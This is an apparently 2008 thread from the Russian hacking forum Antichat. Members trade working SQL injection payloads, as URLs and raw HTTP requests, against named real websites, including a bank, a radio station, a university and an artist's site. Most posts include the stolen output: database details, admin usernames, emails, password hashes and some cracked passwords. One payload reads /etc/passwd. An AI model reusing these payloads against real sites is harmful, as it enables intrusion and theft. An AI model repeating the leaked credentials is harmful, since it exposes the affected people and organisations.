Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
03.10.2008, 11:35
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668
Репутация:
2054
|
|
1
POST /buket/search/ HTTP/1.0
Host: www.difiori.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: hotlog=1; goon=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
action=full&bt=-1+union+select+1,concat_ws(char(58),id,login,pwd,n ame,surname,addr,email,phone),3,4+from+user/*
2
POST /vidau/news/ HTTP/1.0
Host: www.vidau-tv.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: hotlog=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
id=-1+union+select+1,2,concat_ws(char(58),user(),versi on(),database(),login,pwd),4,5+from+user+limit+1,1/*
апд: юзаем http://code.google.com/p/awebtool/ 
__________________
Лучший способ защиты - это нападение!!!
Последний раз редактировалось TANZWUT; 03.10.2008 в 18:25..
|
|
|
03.10.2008, 23:18
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
http://www.downtowncrossing.org/shop/shop.php?id=103+union+select+1,version(),3,4
version() - 5.0.51a-log
user() - Children
database() - Children
http://shop.vashtextil.com.ua/shop.php?id=-1'+union+select+1,2,3,4,5/*
user()- 1gbua_textil@213.186.117.201
http://www.spygenius.co.uk/shop.php?id=-1+union+all+select+1,2,version(),4,5,6
version() - 5.0.27-log
user() - spygenius@213.171.218.192
database() - spygenius
http://www.uazmadi.ru/shop.php?id=-6+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13
version() - 5.0.37
user() - avtomoto@localhost
database() - avtomoto
http://www.avtobamper.ru/shop.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13
version() - 5.0.37
user() - avtomoto@localhost
database() - avtobamper
http://www.propertiesbulgaria.biz/shop.php?id=-11+union+select+version()
version() - 5.0.45-log -
user() - site@localhost
database() - property_site
http://www.propertiesbulgaria.biz/shop.php?id=-11+union+select+concat_ws(0x3a,userid,username,pas sword)+from+admin_users+limit%201,1
Код:
2:admin:$1$jzxqs61n$6hbnVvtb1cJMuHJUJgVEo1
3:alex:$1$rygwg7ng$vwJgHDDb6kOwbn5HcuvT80
4:silveto:$1$55ff1d9v$4ICVoQL.pf0eGBGviplP5.
5:test:$1$8mx0df49$y63yix4opv5W/.YYTAaUT/
6:petya:$1$9v1qx3yv$74NKlG/INFJictQUM6TGN0
http://www.propertiesbulgaria.biz/admin админка здесь |
|
|
|
04.10.2008, 14:47
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070
Репутация:
173
|
|
Міжрегіональна Академія управління персоналом (МАУП)
PR: 4
тИЦ: 180
http://www.maup.com.ua/news/newst.php?tema=-9999+union+select+1,2,version(),4,5/*
VERSION: 4.0.27-standard
|
|
|
|
04.10.2008, 15:11
|
|
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600
Репутация:
850
|
|
http://www.rabota.su/voting/stat.php?id=-99+union+select+1,concat(login,0x3a3a,pwd),3+from+ users--
http://www.gelezo.net/files.php?id=-99'+union+select+1,2,3,4,5,table_name,7,8,9,10,11, 12+from+information_schema.tables+limit+1,1/*
|
|
|
|
04.10.2008, 15:38
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Юмор ФМ, популярное радио и всё такое...
SQL inj присутствует чуть не в каждом параметре.
PR = 3 тИЦ = 30
1) Пятая ветка, доступ к "INFORMATION_SCHEMA" есть.
Код:
http://humor.fm/login/?error=1'+UNION%20SELECT%20CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE())%23
humor@localhost : 5.0.51a-3ubuntu5.1-log : humor
2) Пойдём дальше. Получив все данные из "INFORMATION_SCHEMA"
Код:
http://humor.fm/login/?error=1'+UNION%20SELECT%20CONCAT_WS(0x203A20,login,email,password)%20from%20db_user%20LIMIT%200,1%23
0,1 - выводим по пользователю из БД.
3) А вот и наши админы:
admin : support@idea.net.ua : 5f7c5e847d547b984bab4020c33673ac
cappy : cappy@mail.ru : 168416487b5b0dea3478992a914c7706 - Пасс: fdnjh
qwas : qwas@idea.net.ua : c8e25115addeda1656b52cfbe7b2b780
Joker : joker@idea.net.ua : 589ca240c5222730de730b7013c3b9b6
Decoy : decoy@idea.net.ua : b882e3b467d649792fc4c0cc49592e90
dc : dc@humor.fm : fe07cb53c5b30a97380c6c87efad14b2
kerber : kerber@idea.net.ua : 58acb17af943b7218bca87690910c555 - Пасс: 100385
В итоге, админку не нашёл, в панели юзверей ничего интересного нету ;(
Так-же большое спасибо Alexsize за помощь по SQL
Последний раз редактировалось Nightmarе; 04.10.2008 в 15:44..
|
|
|
|
04.10.2008, 22:08
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
http://www.dissentmagazine.org/online.php?id=117+union+select+1,concat(version(), 0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,0/*
version: 4.1.22
user: dissent@localhost
database: dissent
Вывод внизу.
-----------------------------------------------------------
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat (version(),0x3a,database(),0x3a,user()),8/*
version: 5.0.41-log
user: root@localhost
database: tinymce
Последний раз редактировалось DJ ][akep; 04.10.2008 в 22:13..
|
|
|
|
04.10.2008, 23:26
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Сообщение от 1337haxx0r
офф сайт украинской певицы Русланы
http://www.ruslana.ua/ua/press.php?ln=-1+union+select+load_file(0x2F6574632F706173737764)--
file_priv a также dir )
http://www.ruslana.ua/ua/press.php?ln=-1+union+select+concat_ws(0x3a,username,user_passwo rd)+from+minibb_users--
юзеры форума.. forum.ruslana.ua
http://blog.ruslana.ua/wp-login.php
wp..
admin:$P$B3XVWvBWhENjDsGfhZvFnT9bwxsyI7/
дай пасс дам шелл )
пс: заветное поле - pword
Последний раз редактировалось sabe; 05.10.2008 в 01:02..
|
|
|
|
05.10.2008, 15:49
|
|
Участник форума
Регистрация: 11.04.2007
Сообщений: 103
Провел на форуме:
1006699
Репутация:
273
|
|
http://www.rechtsanwalt-kuprat.de/index2.php?q=dok&sprache=-1%27+union+select+1,2,3,4,5,concat_ws(0x3a,user_ty pe,user_name,user_pw),7,8,9,10+from+fastpublish__f orum_de_userdata/*
fastpublish cms
admin:skatrunde:0a8e991a10144d5056eac00f50b10f2f
|
|
|
|
05.10.2008, 16:09
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633
Репутация:
155
|
|
http://www.bfgbank.ru/index.php?BFGBASID=d8ae804ab8c24dae8dee6eca71b1777 4&action=LegalServises'+union+select+1--
вот скуля на банке..дальше как крутить не знаю..+информатион_схема.те лес не идёт(((
|
|
|
|
05.10.2008, 16:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Купил сегодня плеер - iRiver S10.
iriver.com.ua
Яндекс тІЦ 230
http://www.iriver.com.ua/publication.php?newsid=1486+UNION+SELECT+1,2,3,4,5/*
Database Version: 4.1.22-log
Database name: itkom
User name: dbuser@localhost
__________________
BlackHat. MoDL
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.gif){kind=avatar}
![Аватар для [dword]](/avatars/avatar35341.gif){kind=avatar}
Похожие темы
Линейный вид
